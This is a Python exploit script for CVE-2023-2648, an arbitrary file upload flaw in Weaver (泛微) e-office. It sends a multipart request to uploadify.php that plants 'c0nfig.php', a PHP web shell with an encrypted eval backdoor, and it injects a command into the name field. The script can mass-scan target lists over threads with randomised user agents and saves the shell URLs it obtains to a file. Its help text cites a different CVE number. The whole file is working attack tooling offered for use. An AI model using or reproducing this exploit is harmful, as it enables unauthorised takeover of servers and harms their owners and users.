#! /usr/bin/env python
# -*- encoding: utf-8 -*-
import requests
import sys
from time import time
import random
import urllib3
import base64
from urllib import parse
from argparse import ArgumentParser
import threadpool


#python3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

proxies={'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080'}

#随机ua
def get_ua():
	first_num = random.randint(55, 62)
	third_num = random.randint(0, 3200)
	fourth_num = random.randint(0, 140)
	os_type = [
		'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)'
	]
	chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

	ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
				   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
				  )
	return ua


def wirte_targets(vurl, filename):
	with open(filename, "a+") as f:
		f.write(vurl + "\n")

#getshell函数
def poc(url):
	url=parse.urlparse(url)
	url='{}://{}'.format(url[0],url[1])
	vulnurl=url + "/inc/jquery/uploadify/uploadify.php"
	headers = {
		'User-Agent': get_ua(),
		"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary1ZCUAAAXxnYuVIZR"
	}
	data='''
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="name"

1&&calc&&copy nul a.doc
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="Filedata"; filename="c0nfig.php"
Content-Type: application/msword

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
------WebKitFormBoundary1ZCUAAAXxnYuVIZR--
	
	'''
	try:
		res = requests.post(vulnurl, verify=False, allow_redirects=False, data=data,headers=headers,timeout=10,proxies=proxies)#
		if res.status_code == 200 and int(res.text) >= 1:
			shellurl=url + "/attachment/{}/c0nfig.php".format(res.text)
			print("\033[32m[+]{} is vulnerable\n{}\033[0m".format(vulnurl,shellurl))
			wirte_targets(shellurl,"vuln.txt")
		else:
			print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
	except Exception as e:
		print("\033[34m[!]{} request false.\033[0m".format(url))
		pass


#多线程
def multithreading(url_list, pools=5):
	works = []
	for i in url_list:
		works.append(i)
	pool = threadpool.ThreadPool(pools)
	reqs = threadpool.makeRequests(poc, works)
	[pool.putRequest(req) for req in reqs]
	pool.wait()


if __name__ == "__main__":
	show = r'''

	cve-2023-2648
	                                                                    
                         泛微cve-2023-2648任意文件上传 By when
	'''
	print(show + '\n')
	arg=ArgumentParser(description='check_vulnerabilities By when')
	arg.add_argument("-u",
						"--url",
						help="Target URL; Example:python3 CVE-2023-32315.py -u http://ip:port")
	arg.add_argument("-f",
						"--file",
						help="Target URL; Example:python3 CVE-2023-32315.py -f url.txt")
	args=arg.parse_args()
	url=args.url
	filename=args.file
	start=time()
	if url != None and filename == None:
		poc(url)
	elif url == None and filename != None:
		for i in open(filename):
			i=i.replace('\n','')
			url_list.append(i)
		multithreading(url_list,10)
	end=time()
	print('任务完成，用时%ds' %(end-start))